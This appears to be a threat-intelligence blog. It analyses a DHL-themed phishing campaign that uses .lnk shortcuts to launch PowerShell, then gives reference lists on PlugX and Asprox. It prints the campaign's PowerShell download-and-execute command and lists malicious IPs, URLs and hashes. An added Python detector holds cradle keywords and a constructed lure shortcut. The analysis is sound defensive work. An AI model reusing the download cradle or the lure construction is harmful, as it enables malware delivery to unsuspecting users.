2015-11-19
DHL themed Zeus campaign is using Powershell as malware downloader
I have spotted a DHL-themed phishing campaign using PowerShell as a malware downloader. Here are some samples of the malicious downloader attachment from the phishing email:
https://malwr.com/analysis/YTlhOGRmNTNlYzQzNGIzNTg0ZTZiOTFkNDg1OGI1Nzc/
https://malwr.com/analysis/ZmU0MjliNzNhYmRlNDE1YmE4ZGQ3NWIyNzAxMzQzNzE/
The attachment is a *.doc.zip file (to look like a zipped document) and inside there is a *.doc.lnk.
Instead of an MS Office document there is a Windows shortcut (.lnk), but normal users will most probably see only ".doc", because the default Windows setting hides the extension of known file types. The link file points to the PowerShell binary and carries the download script as its command-line parameter.
PowerShell downloader example (the command-line argument of the shortcut):
(New-Object System.Net.WebClient).DownloadFile('hxxp://nov01mail.pw/bot.exe','%temp%\l.exe');(New-Object -com Shell.Application).ShellExecute('%temp%\l.exe');!%SystemRoot%\system32\SHELL32.dll
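The shortcut trick above is easy to triage offline: the command line sits in the .lnk file's StringData section, so a few lines of parsing recover it without ever running the shortcut. The following is an added example, not code from the original post: a minimal MS-SHLLINK parser that reads the header, skips the optional IDList and LinkInfo blocks, and extracts the relative path, arguments and icon location; a small scorer then flags the three traits of this lure (document-looking double extension, PowerShell as target, WebClient/ShellExecute cradle in the arguments). The sample shortcut is constructed inline with a placeholder download host, and the assumption that the trailing `%SystemRoot%\system32\SHELL32.dll` in the dump above is the shortcut's IconLocation string is mirrored by putting it in that field. The parser only reads the relative-path field for the target; shortcuts that carry the target solely in the IDList or LinkInfo would need those blocks decoded as well.

```python
import struct

# LinkFlags bits from the Shell Link (.lnk) binary format (MS-SHLLINK).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# StringData sections appear in this fixed order when their flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Substrings that, in a shortcut's arguments, indicate a download-and-run cradle.
CRADLE_MARKERS = ("downloadfile", "downloadstring", "webclient",
                  "invoke-webrequest", "shellexecute", "start-process")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk file as a dict of str.

    Handles the header, the optional IDList/LinkInfo skips and the StringData
    section; that is enough to recover the command line passed to the target.
    """
    if len(data) < HEADER_SIZE:
        raise ValueError("too short for a shell link header")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # 2-byte size, then the item ID list
        (idlist_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size
    if flags & HAS_LINK_INFO:                    # 4-byte size that includes itself
        (info_size,) = struct.unpack_from("<I", data, pos)
        pos += info_size
    fields = {}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        (count,) = struct.unpack_from("<H", data, pos)   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        if len(raw) != count * width:
            raise ValueError("truncated StringData in field %s" % key)
        pos += count * width
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return fields


def assess_shortcut(filename: str, data: bytes) -> list:
    """Return the reasons a shortcut attachment looks like the DHL lure; [] if none."""
    reasons = []
    lower_name = filename.lower()
    if lower_name.endswith(".lnk") and lower_name[:-4].endswith((".doc", ".docx", ".pdf", ".xls")):
        reasons.append("double extension hides .lnk behind a document name")
    fields = parse_lnk(data)
    target = fields.get("relative_path", "").lower()
    args = fields.get("arguments", "").lower()
    if "powershell" in target:
        reasons.append("shortcut target is powershell")
    hits = [m for m in CRADLE_MARKERS if m in args]
    if hits:
        reasons.append("download/execute cradle in arguments: " + ", ".join(hits))
    return reasons


def build_lnk(relative_path: str, arguments: str, icon_location: str) -> bytes:
    """Build a minimal Unicode .lnk (no IDList, no LinkInfo) as constructed test input."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sI", HEADER_SIZE, LNK_CLSID, flags)
    header += b"\x00" * (HEADER_SIZE - len(header))       # remaining header fields zeroed
    body = b""
    for s in (relative_path, arguments, icon_location):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed sample mirroring the campaign's shortcut; the download host is a placeholder.
LURE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"(New-Object System.Net.WebClient).DownloadFile('hxxp://example.invalid/bot.exe',"
    r"'%temp%\l.exe');(New-Object -com Shell.Application).ShellExecute('%temp%\l.exe')",
    r"%SystemRoot%\system32\SHELL32.dll",
)
# Constructed benign shortcut for comparison.
BENIGN_LNK = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "", "")

if __name__ == "__main__":
    for name, blob in (("DHL_Paket.doc.lnk", LURE_LNK), ("notes.lnk", BENIGN_LNK)):
        print(name, parse_lnk(blob).get("arguments", "")[:60], assess_shortcut(name, blob))
```

Run over a mail gateway's quarantined .zip contents, `assess_shortcut` gives three independent signals, so a shortcut that hides its target in the IDList still trips on the double extension and the cradle keywords; the `%temp%` and `SHELL32.dll` strings come back verbatim from the StringData fields, which is also how the icon of a .lnk can be made to look like a document.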
The phishing email targets German-speaking victims. Sample emails here:
http://www.trojaner-board.de/172090-gefaelschte-dhl-email-schaedliche-infektion.html
http://www.netzwelt.de/news/155327-vorsicht-dhl-virus-neue-spam-welle-trojaner-anhang.html
http://phishing-mails.blogspot.co.uk/2015/10/dhl-paket-angekommen.html
http://blog.botfrei.de/2015/10/erneute-dhl-spamwelle-erreicht-unsere-rechner/
These IPs seem to be serving as the download sites for the malware (or were at some point in time):
5.1.75.148
64.110.131.48
107.161.27.133
162.221.176.38
172.98.211.5
172.245.59.194
192.95.11.146
192.227.244.6
198.98.101.159
198.175.126.100
216.45.55.231
Download sites:
hxxp://2610goodvin.pw/bot.exe
hxxp://2710goodvin.pw/bot.exe
hxxp://cash777.pw/bot.exe
hxxp://casher777soft.pw/bot.exe
hxxp://cyberdrive77787.pw/bot.exe
hxxp://goodprice27.pw/bot.exe
hxxp://goodprice28.pw/bot.exe
hxxp://goodvin77787.in/bot.exe
hxxp://jinsuperstarberlin.pw/bot.exe
hxxp://mamba7777.pw/bot.exe
hxxp://masterb.in/bot.exe
hxxp://masterdj.pw/bot.exe
hxxp://masterhost2777.pw/bot.exe
hxxp://masterjin777.pw/bot.exe
hxxp://masterl188.pw/bot.exe
hxxp://masterlin188.pw/bot.exe
hxxp://masterlin288.pw/bot.exe
hxxp://masterlin788.pw/bot.exe
hxxp://megamail777.pw/bot.exe
hxxp://mis2018.pw/bot.exe
hxxp://mrsoft777.pw/bot.exe
hxxp://nov01mail.pw/bot.exe
hxxp://nov15mailmarketing.in/bot.exe
hxxp://nov19mailmarketing.pw/bot.exe
hxxp://supermoney.pw/bot.exe
hxxp://supersoftware777.pw/bot.exe
hxxp://superstar7747.pw/bot.exe
hxxp://superstar7747.pw/cc.exe
hxxp://supportsoft777.pw/bot.exe
hxxp://verygoodwin7.pw/bot.exe
Some samples - unfortunately the AV vendors' detections are quite inconclusive on the malware family, but according to abuse.ch it is some modified version of Zeus, so hopefully these will get tracked by ZeusTracker.abuse.ch at some point:
62c02f0bb1145d3928b1df7493476f88
9abcd77b3d4c487c59c88511dcf8a719
8375e892e2c447ffe3e55cb818f68de0
d62a8b934836b58f25f047620f269bc7
09b9b83f37998713ae972a2fc6e45e2f
7dd81b268585c596ed83a38f696a7d4f
4f9e35c56b87b516b587c64da33f2012
581eb87538fd2b65f2ba19f30e2f64ba
363ff98bc76668092eb5b00e55e1a9d3
I was able to obtain these 3 samples and run them through malwr.com:
ccb86eccbde7683410910adf09bc0a62
from hxxp://masterlin788[.]pw/bot.exe
https://malwr.com/analysis/ZjhiMmVkZjI3NGU3NGM1MGFlNzVjZDY0M2Y0NzcxMjI/
https://www.hybrid-analysis.com/sample/f8ab572c3a395812147faed7fef2c688c0c2b3d06c0074ade741ad4d51fd870c/?environmentId=1
d0c2e2a48459ea52cc0e42e15c995ee2
from hxxp://nov19mailmarketing[.]pw/bot.exe
https://malwr.com/analysis/YWNjYWY1NDk5MjAxNGNjYWFiMDEwNTRhNzNmODY0NTk/
https://www.hybrid-analysis.com/sample/6bbb45a9784a0b83f077d6a9d4a7e89d07ddd79a9f8b5d605aad3ab0855d9655?environmentId=1
1a482869a04f9bfe1a557ec391f5df57
from hxxp://supportsoft777[.]pw/bot.exe
https://malwr.com/analysis/YWY3NTZlYjg1NzJjNGFmYjliNDU2NmFhNDBmNjFhYjc/
2015-08-24
PlugX Chronicles
This blog post compiles a list of articles and information bits about PlugX, a malware used as a RAT by several APT groups.
PlugX Tracker - http://ptrack.h3x.eu
PlugX Unsorted Corpus (not categorized samples) http://ptrack.h3x.eu/corpus/297
PlugX Corpus of Setup files (usually RAR SFX) http://ptrack.h3x.eu/corpus/290
PlugX Corpus of EXE (usually signed goodware) http://ptrack.h3x.eu/corpus/291
PlugX Corpus of DLL (malicious stub to load the encrypted payload) http://ptrack.h3x.eu/corpus/292
PlugX Corpus of ENC (encrypted payload) http://ptrack.h3x.eu/corpus/293
PlugX Corpus of DOC (phish documents with embedded PlugX) http://ptrack.h3x.eu/corpus/295
Materials on the topic:
- 2015-11-24 - PaloAltoNetworks - Attack Campaign on the Government of Thailand Delivers Bookworm Trojan
- 2015-11-06 - Volatility Labs - PlugX: Memory Forensics Lifecycle with Volatility - announcement
- 2015-10-29 - Michael Ligh / Volatility Labs - PlugX: The Memory Forensics Lifecycle - presentation
- 2015-10-16 - Citizenlab - Targeted Malware Attacks against NGO Linked to Attacks on Burmese Government Websites
- 2015-10-15 - Charles Rami / Proofpoint - Le cheval de Troie PlugX à l’assaut de l’armée et des télécommunications en Russie
- 2015-10-08 - Sarah Silvestriadis / Wapack Labs - PlugX malware is highly customizable for hackers to pick up – bad news for confidential data
- 2015-09-15 - In Pursuit of Optical Fibers and Troop Intel: Targeted Attack Distributes PlugX in Russia
- 2015-09-13 - Christian - Using threat_note To Track Campaigns: Returning to PIVY and PlugX Infrastructure
- 2015-09-08 - Fabien Perigaud - Volatility plugin for PlugX updated
- 2015-09-04 - Threat Research Team Goes “Beyond the Exploit” in Search of Payloads from MS15-093
- 2015-08-20 - ASERT Threat Intelligence Report 2015-05 PlugX Threat Activity in Myanmar
- 2015-08-19 - Symantec - New Internet Explorer zero-day exploited in Hong Kong attack
- 2015-08-19 - Sara Peters - IE Bug Exploited In Wild After Microsoft Releases Out-Of-Band Patch
- 2015-08-19 - Andra Zaharia - Security Alert: Millions Exposed to Cyber Attacks Because of Internet Explorer Vulnerability
- 2015-08-08 - Christian: Poison Ivy and Links to an Extended PlugX Campaign
- 2015-08-06 - Fabien Perigaud/Airbus - Latest changes in PlugX
- 2015-08-05 - Dell - Threat Group-3390 Targets Organizations for Cyberespionage
- 2015-08-03 - Jason Jones / Arbor - Automating Intelligence: Discovering Recent PlugX Campaigns Programmatically
- 2015-07-30 - Sudeep Singh, Kenneth Hsu / FireEye - CVE-2015-0097 Exploited in the Wild
- 2015-07-28 - FBI Flash - Alert Number A-000063-MW - Plugx
- 2015-06-?? - Paul Shomo - The OPM Hack: I Smell a RAT
- 2015-06-18 - Ellen Nakashima / The Washington Post - Chinese had access to U.S. security clearance data (OPM) for one year
- 2015-04-24 - Roddell Santos / TrendMicro - New Wave of PlugX Targets Legitimate Apps
- 2015-02-15 - Gabor Szappanos / Sophos - plugx-goes-to-the-registry-and-india.pdf
- 2015-02-15 - John Zorabedian / Sophos - research uncovers new developments in PlugX APT malware
- 2015-01-29 - Shusei Tomonaga / JPCERT - Analysis of a Recent PlugX Variant - “P2P PlugX”
- 2014-11-12 - Robert Lipovsky / Korplug military targeted attacks: Afghanistan & Tajikistan
- 2014-10-30 - Gabor Szappanos / Sophos - sophos-rotten-tomato-campaign.pdf
- 2014-10-30 - John Zorabedian / Sophos - The Rotten Tomato Campaign: New SophosLabs research on APTs
- 2014-09-01 - Brandon Dixon - Plugx Development Testing
- 2014-09-01 - @9bplus - Watching Attackers Through Virustotal
- 2014-08-14 - Ned Moran, Joshua Homan, Mike Scott / FireEye - Operation Poisoned Hurricane
- 2014-07-24 - Geok Meng Ong, Chong Rong Hwa / FireEye - Pacific Ring of Fire: PlugX / Kaba
- 2014-07-02 - John Zorabedian / Sophos - The next generation of the PlugX APT – new SophosLabs research
- 2014-06-30 - Gabor Szappanos / Sophos - plugx-thenextgeneration.pdf
- 2014-06-30 - Gabor Szappanos / Sophos - PlugX - the next generation
- 2014-03-31 - Takahiro Haruyama - I Know You Want Me - Unplugging PlugX
- 2014-03-27 - Takahiro Haruyama/CCI - ID/IDAPython scripts extracting PlugX configs
- 2014-03-12 - Takahiro Haruyama - PlugX Builder/Controller (Type III, 0x840)
- 2014-01-29 - Fabien Perigaud / Airbus - PlugX "v2": meet "SController"
- 2014-01-06 - Fabien Perigaud / Airbus - PlugX: some uncovered points
- 2013-12-17 - Roman Vasilenko, Kyle Creyts / Lastline - An Analysis of PlugX Malware
- 2013-12-05 - John Zorabedian / Sophos - SophosLabs researchers dissect PlugX Trojan targeting users in Japan
- 2013-11-12 - Nart Villeneuve, Mike Scott / FireEye - Exploit Proliferation: Additional Threat Groups Acquire CVE-2013-3906
- 2013-05-14 - FireEye - Targeted Attack Trend Alert: PlugX the Old Dog With a New Trick
- 2013-03-26 - Kevin O’Reilly /Contextis - PlugX_-_Payload_Extraction_March_2013_1.pdf
- 2012-11-27 - Dmitry Tarakanov / Kaspersky Securelist - PlugX is Becoming Mature
- 2012-09-17 - Abraham Camba / TrendMicro - Unplugging PlugX Capabilities
- 2012-09-13 - AlienVault - Tracking Down the Author of the PlugX RAT
- 2012-09-10 - Roland Dela Paz / TrendMicro - PlugX: New Tool For a Not So New Campaign
2015-04-08
Asprox botnet chronicles
This blog post compiles a list of articles and information bits about the Asprox botnet.
Asprox malware is spread with phishing emails claiming to be from DHL/Fedex/USPS/American Airlines/Costco/Walmart/Pizza Hut/Home Depot/Target and many others. It also likes to claim to be a court order, a funeral/wedding announcement or a missed voicemail from WhatsApp.
Asprox C2 Tracker - http://atrack.h3x.eu
Asprox Corpus of EXE (downloader) http://atrack.h3x.eu/corpus/2
Asprox Corpus of ZIP (downloader) http://atrack.h3x.eu/corpus/6
Asprox Corpus of EXE (2nd stage/update) http://atrack.h3x.eu/corpus/5
Asprox Corpus of TXT (displayed message) http://atrack.h3x.eu/corpus/7
Asprox Corpus of DLL modules http://atrack.h3x.eu/corpus/8
Materials on the topic:
- 2015-03-09 - Brad Duncan - What Happened to You, Asprox Botnet?
- 2015-02-25 - TechHelpList - former Asprox infrastructure used for drug advertising
- 2015-02-04 - TechHelpList - former Asprox infrastructure used for porn advertising
- 2015-01-02 - Malware-Traffic-Analysis - Fake Target phishing emails from the Asprox botnet
- 2014-12-29 - TechHelpList - Parking Violation Notice - Asprox Malware
- 2014-12-17 - TechHelpList - Details of your order from Best Buy - Asprox Malware
- 2014-12-16 - TechHelpList - Order Confirmation - Walgreens - Asprox Malware
- 2014-12-15 - PaloAlto - Kulouz, Asprox malware family accounts for 80% of attacks
- 2014-12-13 - Softpedia - Facebook Password Change Email Leads to Asprox Malware
- 2014-12-11 - TechHelpList - Facebook password change - Asprox Malware
- 2014-12-11 - The Register - Elderly zombie Asprox botnet STILL mauling biz bods, says survey
- 2014-12-11 - Malware-Traffic-Analysis - Asprox botnet phishing campaign - Subject: Facebook password change
- 2014-12-03 - Gary Warner - ASProx malware threat targets holiday shoppers
- 2014-12-03 - Brian Krebs - Be Wary of ‘Order Confirmation’ Emails
- 2014-11-27 - TechHelpList - Thank you for buying / Order Confirmation / Multiple - Asprox Malware
- 2014-11-20 - Damballa - Partners in Cyber Crime: Following an Advanced Malware Infection Chain
- 2014-11-20 - Damballa - Behind_Malware_Infection_Chain_Rerdom research paper
- 2014-11-12 - Malware-Traffic-Analysis.net - Asprox botnet fake Starbucks phishing emails - delivered Sirius Win 7 Antivirus 2014
- 2014-11-07 - PaloAlto - Kuluoz Trends – October 2014
- 2014-10-29 - Malware-Traffic-Analysis.net - Asprox botnet serving Starbucks coffee
- 2014-10-28 - Malware-Traffic-Analysis.net - Asprox botnet serving free pizza
- 2014-10-08 - TechHelpList - Enjoy your Starbucks Card eGift - Asprox Malware
- 2014-10-02 - TechHelpList - LINE - You have a voice message - Asprox Malware
- 2014-09-11 - Malware-Traffic-Analysis.net - Asprox botnet phishing campaign - DPD - Subject: Home Delivery Notification
- 2014-09-09 - Malware-Traffic-Analysis.net - Asprox botnet phishing emails - Delta Airlines
- 2014-09-05 - Malware-Traffic-Analysis.net - Asprox botnet phishing email - FedEx - Subject: Postal Notification
- 2014-08-29 - Malware-Traffic-Analysis.net - Asprox botnet phishing email - Subject: Notice of court attendance
- 2014-08-28 - Nick - How Asprox Malware Became an APT in 4 Phases
- 2014-08-18 - Malware-Traffic-Analysis.net - Asprox botnet phishing email - Subject: Payment for driving on a toll road
- 2014-08-06 - Symantec - Asprox URLViewer delivers porn adverts
- 2014-08-04 - Kimberly - Asprox Update - Version 2050
- 2014-07-28 - Long Tran (Fortinet) - Changes in the Asprox Botnet
- 2014-07-22 - Malware-Traffic-Analysis.net - Asprox botnet fake E-ZPass phishing emails
- 2014-07-10 - Malware-Traffic-Analysis.net - Asprox botnet fake court case phishing emails
- 2014-07-09 - Malware-Traffic-Analysis.net - Asprox botnet fake funeral announcement phishing emails
- 2014-07-08 - Malware-Traffic-Analysis.net - Asprox botnet fake E-ZPASS phishing emails
- 2014-06-17 - Kevin Ross - Suricata IDS signature for Asprox traffic
- 2014-06-16 - FireEye - A Not-So Civic Duty: Asprox Botnet Campaign Spreads Court Dates and Malware
- 2014-05-15 - Kimberly - A Journey Inside the Asprox Modules
- 2014-03-17 - Frank Jas - New variant of Kuluoz discovered
- 2014-02-28 - Kimberly - Urgent eviction notification - A deeper dive into the Asprox Ecosystem
- 2014-02-12 - TechHelpList - Your application received - Asprox Malware
- 2014-02-06 - TechHelpList - Asprox botnet advertising fraud - general overview 1
- 2014-01-30 - Kimberly - Eubank Funeral Home themed emails lead to Asprox
- 2014-01-30 - Brad - Asprox Emails and Malware
- 2014-01-11 - Kimberly - PG&E Energy Statement themed emails lead to Asprox
- 2014-01-15 - TechHelpList - Death Notification - Asprox Malware
- 2014-01-07 - TechHelpList - Delivery Canceling - Energy Statement - Malware
- 2014-01-07 - Kimberly - Best Buy themed emails lead to Asprox
- 2014-01-06 - TechHelpList - Asprox botnet trojan run - advertising fraud 1
- 2014-01-04 - Herrcore - Inside The New Asprox/Kuluoz
- 2014-01-05 - Kimberly - Atmos Energy Bill themed emails lead to Asprox
- 2013-12-30 - Kimberly - The Asprox botnet wants you to appear in Court
- 2014-12-26 - Kimberly - Costco themed emails lead to Asprox
- 2013-12-26 - Peter Kruse - Asprox er tilbage (Adobe License)
- 2013-12-26 - Gary Warner - Holiday Delivery Failures lead to Kuluoz malware
- 2013-12-26 - TechHelpList - Scheduled Home Delivery Problem - Asprox Malware
- 2013-12-23 - TechHelpList - Hearing of your case in Court NR#... - Virus
- 2013-12-23 - Conrad Longmore - "Hearing of your case in Court NR#6976" spam
- 2013-12-23 - Daniel Wesemann - Costco, BestBuy, Walmart really want to send you a package!
- 2013-12-23 - TechHelpList - Hearing of your case in Court NR#... - Virus
- 2013-12-22 - TechHelpList - Asprox botnet trojan run - malware spamming 1
- 2013-12-20 - TechHelpList - Please look my CV - Virus
- 2013-12-14 - Johannes B. Ullrich - WhatsApp Malware Spam uses Geolocation to Mass Customize Filename
- 2013-12-06 - TechHelpList - You can download your ticket #... - Virus
- 2013-11-28 - Kimberly - Fake WhatsApp Voice Mail Notification invites Asprox and friends - Kimberly spotted that the downloads use GeoIP location to customize the filename
- 2013-11-13 - Kimberly - Analysis of Asprox and its New Encryption Scheme
- 2013-11-12 - TechHelpList - New Voicemail Notification - WhatsApp - Malware
- 2013-10-18 - TechHelpList - Wedding Invitation - Malware
- 2013-09-20 - Gary Warner - Fake AV Malware Hits the Android
- 2013-08-15 - Shaked Bar - Kuluoz: Malware and botnet analysis
- 2013-07-07 - #MalwareMustDie! In war with Kuluoz network../2/3
- 2013-06-05 - TechHelpList - Fake Fedex Item Forbidden - Virus
- 2013-06-04 - TechHelpList - Your Parcel Has Been Send - Virus
- 2013-05-01 - RebSnippets - Asprox Botnet 2013 - Phishing Malware As a Service
- 2013-04-22 - TechHelpList - Your Order - Fake DHL Malware
- 2013-03-04 - Trendmicro - Asprox Reborn blog
- 2013-02-28 - Trendmicro - Asprox Reborn research paper
- 2013-02-01 - Trendmicro - Asprox Botnet Reemerges in the Form of KULUOZ
- 2013-02-01 - Trendmicro - BKDR_KULUOZ – At a Spam Near You
- 2012-10-09 - HertSec - Investigating UPS Phishing Emails
- 2012-12-12 - Kent Backman - Another familiar phish, yet more ransomware controller proxies
- 2012-09-25 - Kent Backman - New Asprox phish, a few old and many more controller proxies
- 2012-09-21 - Miroslav Stampar - Analysis of mass SQL injection attacks(old scheme)
- 2012-09-15 - Kent Backman - Click here for your Asprox package
- 2012-08-30 - Christopher J. Marcinko - No, USPS Did Not Fail to Deliver a Package This Week
- 2012-01-14 - Ken Johnson - FakeAVLock - FedEx Shipping Issues - Revisited
- 2010-06-25 - ITNews - Asprox botnet causing serious concern
- 2009-10-05 - Gunter Ollmann - Asprox Rearing its SQL Injection Head Again
- 2009-02-10 - Greg Martin - ASPROX Back with a vengance
- 2008-09-29 - SANS - ASPROX mutant
- 2008-08-04 - Greg Martin - ASPROX Latest Attack Vector: JS.JS
- 2008-07-?? - SANS - Cleanup in isle 3 please. Asprox lying around
- 2008-07-23 - Greg Martin - ASPROX SQL Injection Botnet and iFrame/Malware
- 2008-07-07 - Greg Martin - ASPROX Payload Morphed NGG.JS
- 2008-06-30 - SANS Robert Danford - More SQL Injection with Fast Flux hosting
- 2008-06-26 - Greg Martin - ASPROX SQL Injection Attacks cont.
- 2008-06-23 - Greg Martin - ASPROX SQL Injection Botnet and iFrame/Malware
- 2008-06-13 - SANS Johannes Ullrich - SQL Injection: More of the same
- 2008-01-09 - SANS Bojan Zdrnja - Mass exploits with SQL Injection